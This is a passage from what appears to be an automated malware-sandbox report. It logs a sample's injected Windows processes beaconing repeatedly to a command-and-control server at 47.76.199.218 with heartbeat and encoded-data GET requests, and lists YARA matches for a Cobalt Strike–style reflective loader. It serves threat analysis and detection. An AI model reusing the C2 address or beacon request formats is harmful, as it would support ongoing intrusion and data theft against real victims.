                                                    Jan 2, 2025 09:29:01.859281063 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 35 34 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.54985047.76.199.218805772C:\Windows\SysWOW64\fontview.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:07.258675098 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:29:07.263497114 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 35 34 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.54988347.76.199.218805772C:\Windows\SysWOW64\fontview.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:12.680989981 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:29:12.685796022 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 35 34 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.54991947.76.199.218805772C:\Windows\SysWOW64\fontview.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:19.458445072 CET659OUTGET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSY*QJSm*Ua4R0nKTUopxtu5aRZUmxtV*TsHV29kf7cYL-MjTc*kRfIpjTbB7xzYWtqF*O5vPdazU9kHSC8*d0RJwPJPGxrPzKc6**Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfb*fRmwgZ5cGzSva*FX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoV*Ov87GDYU96jq0srfmNJ*L5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pN*JsxbItKeA*DsMEI= HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 508
                                                    Jan 2, 2025 09:29:19.463282108 CET508OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 49 6e 64 65 78 6e 65 77 3f 64 3d 31 26 6d 65 6d 62 65 72 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 73 74 61 6d 70 74 69 6d 65 3d 31 37 33 35 38 30 36 35 37 39 26 64 61 74 61 3d 48 2d
                                                    Data Ascii: /index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSY*QJSm*Ua4R0nKTUopxtu5aRZUmxtV*TsHV29kf7cYL-MjTc*kRfIpjTbB7xzYWtqF*O5vPdazU9kHSC8*d0RJwPJPGxrPzKc6*


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.54995647.76.199.218803376C:\Windows\SysWOW64\resmon.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:24.658730030 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:29:24.663598061 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 36 33 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.54998747.76.199.218803376C:\Windows\SysWOW64\resmon.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:30.057358980 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:29:30.062263012 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 36 33 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.54998847.76.199.218803376C:\Windows\SysWOW64\resmon.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:35.487802029 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:29:35.492857933 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 36 33 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.54998947.76.199.218803376C:\Windows\SysWOW64\resmon.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:40.884139061 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:29:40.889568090 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 36 33 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.54999147.76.199.218803376C:\Windows\SysWOW64\resmon.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:46.644011974 CET659OUTGET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=rzFF8CF3nR2uBDTXa1dRB*Sycwp2sHLkg*ahbNYN1YCtMEvMDGfRg6JOn3ruHXc8o3N*M3W*aD1dNXf0RgkRbMxSQ-H6flMFA6epDsoU7J5lszQTKrRqwxpQiLuqXUBReGTnrx3zKRLwmddifMNoTFN5UPTNAlHGR7ZET6JoCuTkfmg25v5NfHejoxaRK3MJXB-kxeC8EXo86ufoEwJDBZ0YSyPVb187fRMrEsv98eZc3VzEm5jYhOnRaVHVPJIJu3VXi7efKDFzmUmEadB2kvhr4b6LDN6*7EvnQ711qTV-6DBxDbjTha0oYb8MNfPWDfiAJDK7Vh4kTGNE-Pd93SwqWoTbTib258IG4Cih5PIqc1D5GQSGoS4yMsZ5R313wyOFatSdhLrIN2c3W1PA-jU7GXVAV0sjibBZrNgSIco= HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 508
                                                    Jan 2, 2025 09:29:46.648941040 CET508OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 49 6e 64 65 78 6e 65 77 3f 64 3d 31 26 6d 65 6d 62 65 72 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 73 74 61 6d 70 74 69 6d 65 3d 31 37 33 35 38 30 36 36 30 37 26 64 61 74 61 3d 72 7a
                                                    Data Ascii: /index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=rzFF8CF3nR2uBDTXa1dRB*Sycwp2sHLkg*ahbNYN1YCtMEvMDGfRg6JOn3ruHXc8o3N*M3W*aD1dNXf0RgkRbMxSQ-H6flMFA6epDsoU7J5lszQTKrRqwxpQiLuqXUBReGTnrx3zKRLwmddifMNoTFN5UPTNAlHGR7Z


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.54999247.76.199.218806404C:\Windows\SysWOW64\BackgroundTransferHost.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:51.230673075 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:29:51.235726118 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 37 32 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.54999347.76.199.218806404C:\Windows\SysWOW64\BackgroundTransferHost.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:56.822602987 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:29:56.827496052 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 37 32 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.54999447.76.199.218806404C:\Windows\SysWOW64\BackgroundTransferHost.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:30:02.461817026 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:30:02.466649055 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 37 32 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.54999547.76.199.218806404C:\Windows\SysWOW64\BackgroundTransferHost.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:30:07.869333029 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:30:07.874317884 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 37 32 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.54999647.76.199.218806404C:\Windows\SysWOW64\BackgroundTransferHost.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:30:14.622060061 CET659OUTGET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjB*W1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82*Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZs*drjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PX*FHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8= HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 508
                                                    Jan 2, 2025 09:30:14.627007961 CET508OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 49 6e 64 65 78 6e 65 77 3f 64 3d 31 26 6d 65 6d 62 65 72 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 73 74 61 6d 70 74 69 6d 65 3d 31 37 33 35 38 30 36 36 33 35 26 64 61 74 61 3d 65 6e
                                                    Data Ascii: /index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjB*W1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNg


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.54999747.76.199.218805568C:\Windows\SysWOW64\raserver.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:30:20.098669052 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:30:20.103477955 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 38 31 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.54999847.76.199.218805568C:\Windows\SysWOW64\raserver.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:30:25.493458986 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:30:25.498305082 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 38 31 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.54999947.76.199.218805568C:\Windows\SysWOW64\raserver.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:30:30.901451111 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:30:30.908499956 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 38 31 38 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:03:28:24
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\Desktop\1731043030539.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\1731043030539.exe"
                                                    Imagebase:0x7ff6e5340000
                                                    File size:1'088'000 bytes
                                                    MD5 hash:0FFA0039C3E96E4B95293B09DB72CD85
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.2033463108.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:03:28:25
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p
                                                    Imagebase:0x7ff7e52b0000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                    • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                    • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                    • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                    • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                    • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:2
                                                    Start time:03:28:25
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff674740000
                                                    File size:5'141'208 bytes
                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:3
                                                    Start time:03:28:25
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\SysWOW64\control.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\control.exe
                                                    Imagebase:0xde0000
                                                    File size:149'504 bytes
                                                    MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000003.2037787029.0000000000B10000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:6
                                                    Start time:03:28:55
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\SysWOW64\fontview.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\fontview.exe
                                                    Imagebase:0xe50000
                                                    File size:113'152 bytes
                                                    MD5 hash:8324ECE6961ADBE6120CCE9E0BC05F76
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000006.00000003.2336009620.0000000000820000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:03:29:23
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\SysWOW64\resmon.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\resmon.exe
                                                    Imagebase:0x2a0000
                                                    File size:109'056 bytes
                                                    MD5 hash:29C52C15D2D68A4BBE9A36701D31100E
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000008.00000003.2618083519.0000000002300000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000008.00000002.3295072698.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:9
                                                    Start time:03:29:49
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\SysWOW64\BackgroundTransferHost.exe
                                                    Wow64 process (32bit):true
